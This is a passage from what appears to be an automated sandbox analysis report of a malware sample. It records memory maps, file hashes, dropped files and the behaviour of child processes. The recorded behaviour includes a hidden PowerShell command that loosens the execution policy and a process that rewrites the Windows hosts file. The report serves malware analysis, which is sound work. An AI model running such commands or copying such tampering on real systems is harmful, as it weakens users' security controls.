wow64win.dll	0x74da0000	0x74dfbfff	Memory Mapped File	rwx	-
wow64.dll	0x74e00000	0x74e3efff	Memory Mapped File	rwx	-
ntmarta.dll	0x74e90000	0x74eb0fff	Memory Mapped File	rwx	-
comctl32.dll	0x74ec0000	0x7505dfff	Memory Mapped File	rwx	-
profapi.dll	0x75200000	0x7520afff	Memory Mapped File	rwx	-
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	rwx	-
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	rwx	-
usp10.dll	0x75410000	0x754acfff	Memory Mapped File	rwx	-
clbcatq.dll	0x754b0000	0x75532fff	Memory Mapped File	rwx	-
ole32.dll	0x75540000	0x7569bfff	Memory Mapped File	rwx	-
wldap32.dll	0x756a0000	0x756e4fff	Memory Mapped File	rwx	-
user32.dll	0x756f0000	0x757effff	Memory Mapped File	rwx	-
iertutil.dll	0x757f0000	0x759eafff	Memory Mapped File	rwx	-
kernel32.dll	0x75a20000	0x75b2ffff	Memory Mapped File	rwx	-
advapi32.dll	0x75b30000	0x75bcffff	Memory Mapped File	rwx	-
wininet.dll	0x75be0000	0x75cd4fff	Memory Mapped File	rwx	-
shlwapi.dll	0x75ce0000	0x75d36fff	Memory Mapped File	rwx	-
msctf.dll	0x75d40000	0x75e0bfff	Memory Mapped File	rwx	-
devobj.dll	0x75e10000	0x75e21fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75e30000	0x75edbfff	Memory Mapped File	rwx	-
oleaut32.dll	0x75f60000	0x75feefff	Memory Mapped File	rwx	-
setupapi.dll	0x75ff0000	0x7618cfff	Memory Mapped File	rwx	-
crypt32.dll	0x76190000	0x762acfff	Memory Mapped File	rwx	-
sechost.dll	0x762b0000	0x762c8fff	Memory Mapped File	rwx	-
lpk.dll	0x762d0000	0x762d9fff	Memory Mapped File	rwx	-
urlmon.dll	0x762e0000	0x76415fff	Memory Mapped File	rwx	-
imm32.dll	0x76500000	0x7655ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x765f0000	0x76635fff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x76640000	0x76666fff	Memory Mapped File	rwx	-
shell32.dll	0x76670000	0x772b9fff	Memory Mapped File	rwx	-
msasn1.dll	0x772c0000	0x772cbfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772d0000	0x773bffff	Memory Mapped File	rwx	-
gdi32.dll	0x773c0000	0x7744ffff	Memory Mapped File	rwx	-
private_0x0000000077450000	0x77450000	0x77549fff	Private Memory	rwx	-
private_0x0000000077550000	0x77550000	0x7766efff	Private Memory	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	rwx	-
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	rw	-
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	rw	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	rw	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	rw	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Host Behavior

File (3)

Operation	Filename	Additional Information	Count	Logfile
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe	show_window = SW_SHOW		1	Fn

Module (22)

Operation	Module	Additional Information	Count	Logfile
Load	api-ms-win-core-synch-l1-2-0	base_address = 0x0	2	Fn
Load	kernel32	base_address = 0x0	2	Fn
Load	kernel32	base_address = 0x75a20000	2	Fn
Load	api-ms-win-core-fibers-l1-1-1	base_address = 0x0	2	Fn
Load	api-ms-win-core-localization-l1-2-1	base_address = 0x0	1	Fn
Load	api-ms-win-appmodel-runtime-l1-1-2	base_address = 0x0	1	Fn
Get Handle	c:\users\5p5nrgjn0js halpmcxz\appdata\local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe	base_address = 0x3a0000	2	Fn
Get Handle	mscoree.dll	-	1	Fn
Get Filename	api-ms-win-core-localization-l1-2-1	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x75a34d28	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x75a34f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x75a34208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x75a31252	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x75ab47f1	1	Fn

System (1)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2018-11-19 13:56:18 (UTC)		1	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data

Process #9: 1.exe

Information	Value
ID	#9
File Name	c:\users\5p5nrgjn0js halpmcxz\appdata\local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe" --Admin
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\
Monitor	Start Time: 00:00:59, Reason: Child Process
Unmonitor	End Time: 00:01:03, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

Information	Value
PID	0x9e8
Parent PID	0x9cc (c:\users\5p5nrgjn0js halpmcxz\appdata\local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 9EC

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	r	-
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	r	-
pagefile_0x00000000000e0000	0x000e0000	0x000e0fff	Pagefile Backed Memory	rw	-
private_0x0000000000130000	0x00130000	0x0016ffff	Private Memory	rw	-
private_0x0000000000210000	0x00210000	0x0021ffff	Private Memory	rw	-
private_0x00000000002b0000	0x002b0000	0x0032ffff	Private Memory	rw	-
1.exe	0x003a0000	0x003d1fff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x0000000000480000	0x00480000	0x0057ffff	Private Memory	rw	-
private_0x00000000006c0000	0x006c0000	0x007bffff	Private Memory	rw	-
pagefile_0x00000000007c0000	0x007c0000	0x00947fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000950000	0x00950000	0x00ad0fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000ae0000	0x00ae0000	0x01edffff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01ee0000	0x021aefff	Memory Mapped File	r	-
wow64cpu.dll	0x74d90000	0x74d97fff	Memory Mapped File	rwx	-
wow64win.dll	0x74da0000	0x74dfbfff	Memory Mapped File	rwx	-
wow64.dll	0x74e00000	0x74e3efff	Memory Mapped File	rwx	-
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	rwx	-
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	rwx	-
usp10.dll	0x75410000	0x754acfff	Memory Mapped File	rwx	-
ole32.dll	0x75540000	0x7569bfff	Memory Mapped File	rwx	-
user32.dll	0x756f0000	0x757effff	Memory Mapped File	rwx	-
kernel32.dll	0x75a20000	0x75b2ffff	Memory Mapped File	rwx	-
advapi32.dll	0x75b30000	0x75bcffff	Memory Mapped File	rwx	-
shlwapi.dll	0x75ce0000	0x75d36fff	Memory Mapped File	rwx	-
msctf.dll	0x75d40000	0x75e0bfff	Memory Mapped File	rwx	-
msvcrt.dll	0x75e30000	0x75edbfff	Memory Mapped File	rwx	-
sechost.dll	0x762b0000	0x762c8fff	Memory Mapped File	rwx	-
lpk.dll	0x762d0000	0x762d9fff	Memory Mapped File	rwx	-
imm32.dll	0x76500000	0x7655ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x765f0000	0x76635fff	Memory Mapped File	rwx	-
shell32.dll	0x76670000	0x772b9fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772d0000	0x773bffff	Memory Mapped File	rwx	-
gdi32.dll	0x773c0000	0x7744ffff	Memory Mapped File	rwx	-
private_0x0000000077450000	0x77450000	0x77549fff	Private Memory	rwx	-
private_0x0000000077550000	0x77550000	0x7766efff	Private Memory	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	rwx	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1	0.05 KB	MD5: f972c62f986b5ed49ad7713d93bf6c9f SHA1: 4e157002bdb97e9526ab97bfafbf7c67e1d1efbf SHA256: b47f85974a7ec2fd5aa82d52f08eb0f6cea7e596a98dd29e8b85b5c37beca0a8 SSDeep: 3:uIHeGAFcX5wTnl:/eGgHTl		... File Actions Show Properties Download

Host Behavior

File (5)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1	size = 49	1	Fn Data

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned	os_pid = 0x9f0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE		1	Fn

Module (18)

Operation	Module	Additional Information	Count	Logfile
Load	api-ms-win-core-synch-l1-2-0	base_address = 0x0	2	Fn
Load	kernel32	base_address = 0x0	2	Fn
Load	kernel32	base_address = 0x75a20000	2	Fn
Load	api-ms-win-core-fibers-l1-1-1	base_address = 0x0	2	Fn
Load	api-ms-win-core-localization-l1-2-1	base_address = 0x0	1	Fn
Get Filename	api-ms-win-core-localization-l1-2-1	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x75a34d28	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x75a34f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x75a34208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x75a31252	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x75ab47f1	1	Fn

System (1)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2018-11-19 13:56:18 (UTC)		1	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data

Process #10: powershell.exe

Information	Value
ID	#10
File Name	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line	powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\
Monitor	Start Time: 00:00:59, Reason: Child Process
Unmonitor	End Time: 00:01:03, Reason: Self Terminated
Monitor Duration	00:00:04
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x9f0
Parent PID	0x9e8 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 9F4 0x A10 0x A1C 0x A28

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	r	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	r	-
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	r	-
pagefile_0x00000000000e0000	0x000e0000	0x000e1fff	Pagefile Backed Memory	rw	-
powershell.exe.mui	0x000f0000	0x000f2fff	Memory Mapped File	rw	-
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	rw	-
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	rw	-
pagefile_0x0000000000120000	0x00120000	0x00120fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000130000	0x00130000	0x00130fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000140000	0x00140000	0x00141fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000150000	0x00150000	0x00150fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000160000	0x00160000	0x00161fff	Pagefile Backed Memory	r	-
cversions.2.db	0x00170000	0x00173fff	Memory Mapped File	r	-
pagefile_0x0000000000180000	0x00180000	0x00180fff	Pagefile Backed Memory	rw	-
private_0x0000000000190000	0x00190000	0x001cffff	Private Memory	rw	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db	0x001d0000	0x001eefff	Memory Mapped File	r	-
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db	0x001f0000	0x0021ffff	Memory Mapped File	r	-
cversions.2.db	0x00220000	0x00223fff	Memory Mapped File	r	-
private_0x0000000000250000	0x00250000	0x0028ffff	Private Memory	rw	-
private_0x0000000000290000	0x00290000	0x0029ffff	Private Memory	rw	-
private_0x00000000002a0000	0x002a0000	0x002dffff	Private Memory	rw	-
private_0x00000000002f0000	0x002f0000	0x0032ffff	Private Memory	rw	-
private_0x0000000000330000	0x00330000	0x0036ffff	Private Memory	rw	-
private_0x0000000000390000	0x00390000	0x0040ffff	Private Memory	rw	-
private_0x0000000000460000	0x00460000	0x0049ffff	Private Memory	rw	-
private_0x00000000004c0000	0x004c0000	0x005bffff	Private Memory	rw	-
pagefile_0x00000000005c0000	0x005c0000	0x00747fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000750000	0x00750000	0x008d0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000008e0000	0x008e0000	0x01cdffff	Pagefile Backed Memory	r	-
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x01ce0000	0x01d45fff	Memory Mapped File	r	-
private_0x0000000001d70000	0x01d70000	0x01daffff	Private Memory	rwx	-
private_0x0000000001e40000	0x01e40000	0x01e4ffff	Private Memory	rw	-
private_0x0000000001e80000	0x01e80000	0x01ebffff	Private Memory	rw	-
private_0x0000000001f00000	0x01f00000	0x01f3ffff	Private Memory	rw	-
pagefile_0x0000000001f40000	0x01f40000	0x0201efff	Pagefile Backed Memory	r	-
sortdefault.nls	0x02020000	0x022eefff	Memory Mapped File	r	-
private_0x00000000022f0000	0x022f0000	0x023effff	Private Memory	rw	-
pagefile_0x00000000023f0000	0x023f0000	0x027e2fff	Pagefile Backed Memory	r	-
private_0x0000000002890000	0x02890000	0x028cffff	Private Memory	rw	-
powershell.exe	0x21e70000	0x21ee1fff	Memory Mapped File	rwx	-
mscoreei.dll	0x747a0000	0x74817fff	Memory Mapped File	rwx	-
slc.dll	0x74820000	0x74829fff	Memory Mapped File	rwx	-
cscapi.dll	0x74830000	0x7483afff	Memory Mapped File	rwx	-
srvcli.dll	0x74840000	0x74858fff	Memory Mapped File	rwx	-
ntshrui.dll	0x74860000	0x748cffff	Memory Mapped File	rwx	-
userenv.dll	0x748d0000	0x748e6fff	Memory Mapped File	rwx	-
mscoree.dll	0x748f0000	0x74939fff	Memory Mapped File	rwx	-
shdocvw.dll	0x74940000	0x7496dfff	Memory Mapped File	rwx	-
linkinfo.dll	0x74970000	0x74978fff	Memory Mapped File	rwx	-
atl.dll	0x74980000	0x74993fff	Memory Mapped File	rwx	-
apphelp.dll	0x749a0000	0x749ebfff	Memory Mapped File	rwx	-
propsys.dll	0x749f0000	0x74ae4fff	Memory Mapped File	rwx	-
version.dll	0x74af0000	0x74af8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x74d00000	0x74d7ffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74d90000	0x74d97fff	Memory Mapped File	rwx	-
wow64win.dll	0x74da0000	0x74dfbfff	Memory Mapped File	rwx	-
wow64.dll	0x74e00000	0x74e3efff	Memory Mapped File	rwx	-
ntmarta.dll	0x74e90000	0x74eb0fff	Memory Mapped File	rwx	-
comctl32.dll	0x74ec0000	0x7505dfff	Memory Mapped File	rwx	-
rsaenh.dll	0x75060000	0x7509afff	Memory Mapped File	rwx	-
cryptsp.dll	0x750a0000	0x750b5fff	Memory Mapped File	rwx	-
profapi.dll	0x75200000	0x7520afff	Memory Mapped File	rwx	-
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	rwx	-
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	rwx	-
usp10.dll	0x75410000	0x754acfff	Memory Mapped File	rwx	-
clbcatq.dll	0x754b0000	0x75532fff	Memory Mapped File	rwx	-
ole32.dll	0x75540000	0x7569bfff	Memory Mapped File	rwx	-
wldap32.dll	0x756a0000	0x756e4fff	Memory Mapped File	rwx	-
user32.dll	0x756f0000	0x757effff	Memory Mapped File	rwx	-
kernel32.dll	0x75a20000	0x75b2ffff	Memory Mapped File	rwx	-
advapi32.dll	0x75b30000	0x75bcffff	Memory Mapped File	rwx	-
shlwapi.dll	0x75ce0000	0x75d36fff	Memory Mapped File	rwx	-
msctf.dll	0x75d40000	0x75e0bfff	Memory Mapped File	rwx	-
devobj.dll	0x75e10000	0x75e21fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75e30000	0x75edbfff	Memory Mapped File	rwx	-
oleaut32.dll	0x75f60000	0x75feefff	Memory Mapped File	rwx	-
setupapi.dll	0x75ff0000	0x7618cfff	Memory Mapped File	rwx	-
sechost.dll	0x762b0000	0x762c8fff	Memory Mapped File	rwx	-
lpk.dll	0x762d0000	0x762d9fff	Memory Mapped File	rwx	-
imm32.dll	0x76500000	0x7655ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x765f0000	0x76635fff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x76640000	0x76666fff	Memory Mapped File	rwx	-
shell32.dll	0x76670000	0x772b9fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772d0000	0x773bffff	Memory Mapped File	rwx	-
gdi32.dll	0x773c0000	0x7744ffff	Memory Mapped File	rwx	-
private_0x0000000077450000	0x77450000	0x77549fff	Private Memory	rwx	-
private_0x0000000077550000	0x77550000	0x7766efff	Private Memory	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	rwx	-
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	rw	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	rw	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	rw	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Process #11: 2.exe

Information	Value
ID	#11
File Name	c:\users\5p5nrgjn0js halpmcxz\appdata\local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\2.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\2.exe"
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:59, Reason: Child Process
Unmonitor	End Time: 00:01:00, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0x9f8
Parent PID	0x904 (c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 9FC

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x0002ffff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	r	-
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	rw	-
pagefile_0x0000000000080000	0x00080000	0x00080fff	Pagefile Backed Memory	rw	-
private_0x0000000000090000	0x00090000	0x000cffff	Private Memory	rw	-
locale.nls	0x000d0000	0x00136fff	Memory Mapped File	r	-
private_0x00000000001d0000	0x001d0000	0x002cffff	Private Memory	rw	-
private_0x00000000003a0000	0x003a0000	0x0041ffff	Private Memory	rw	-
private_0x00000000004f0000	0x004f0000	0x005effff	Private Memory	rw	-
pagefile_0x00000000005f0000	0x005f0000	0x00777fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000780000	0x00780000	0x00900fff	Pagefile Backed Memory	r	-
2.exe	0x00cf0000	0x00d21fff	Memory Mapped File	rwx	... Region Actions Download Dump
pagefile_0x0000000000d30000	0x00d30000	0x0212ffff	Pagefile Backed Memory	r	-
wow64cpu.dll	0x74d90000	0x74d97fff	Memory Mapped File	rwx	-
wow64win.dll	0x74da0000	0x74dfbfff	Memory Mapped File	rwx	-
wow64.dll	0x74e00000	0x74e3efff	Memory Mapped File	rwx	-
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	rwx	-
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	rwx	-
usp10.dll	0x75410000	0x754acfff	Memory Mapped File	rwx	-
ole32.dll	0x75540000	0x7569bfff	Memory Mapped File	rwx	-
user32.dll	0x756f0000	0x757effff	Memory Mapped File	rwx	-
kernel32.dll	0x75a20000	0x75b2ffff	Memory Mapped File	rwx	-
advapi32.dll	0x75b30000	0x75bcffff	Memory Mapped File	rwx	-
shlwapi.dll	0x75ce0000	0x75d36fff	Memory Mapped File	rwx	-
msctf.dll	0x75d40000	0x75e0bfff	Memory Mapped File	rwx	-
msvcrt.dll	0x75e30000	0x75edbfff	Memory Mapped File	rwx	-
sechost.dll	0x762b0000	0x762c8fff	Memory Mapped File	rwx	-
lpk.dll	0x762d0000	0x762d9fff	Memory Mapped File	rwx	-
imm32.dll	0x76500000	0x7655ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x765f0000	0x76635fff	Memory Mapped File	rwx	-
shell32.dll	0x76670000	0x772b9fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772d0000	0x773bffff	Memory Mapped File	rwx	-
gdi32.dll	0x773c0000	0x7744ffff	Memory Mapped File	rwx	-
private_0x0000000077450000	0x77450000	0x77549fff	Private Memory	rwx	-
private_0x0000000077550000	0x77550000	0x7766efff	Private Memory	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	rwx	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Modified Files

Filename	File Size	Hash Values	YARA Match	Actions
C:\Windows\System32\drivers\etc\hosts	7.92 KB	MD5: 360d265eddea8679c434a205f7ade7ad SHA1: e17d843f610e0283904e201195360525ae449a68 SHA256: 5a1597c0d29dd475e33cd8889d7d848037a8c17bad0f3daa022fb889e0db7ead SSDeep: 96:vDZEurK9q3WlSyU0FXmGZll0TOHyF9fAHLmttA/ZKTKdIlMHqzoCGbXx:RrK9FU0FXmGZll06m9fAH6AhKTK9Cax		... File Actions Show Properties Download

Host Behavior

File (6)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Windows\System32\drivers\etc\hosts	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Windows\System32\drivers\etc\hosts	type = size	1	Fn
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Write	C:\Windows\System32\drivers\etc\hosts	size = 7286	1	Fn Data

Module (22)

Operation	Module	Additional Information	Count	Logfile
Load	api-ms-win-core-synch-l1-2-0	base_address = 0x0	2	Fn
Load	kernel32	base_address = 0x0	2	Fn
Load	kernel32	base_address = 0x75a20000	2	Fn
Load	api-ms-win-core-fibers-l1-1-1	base_address = 0x0	2	Fn
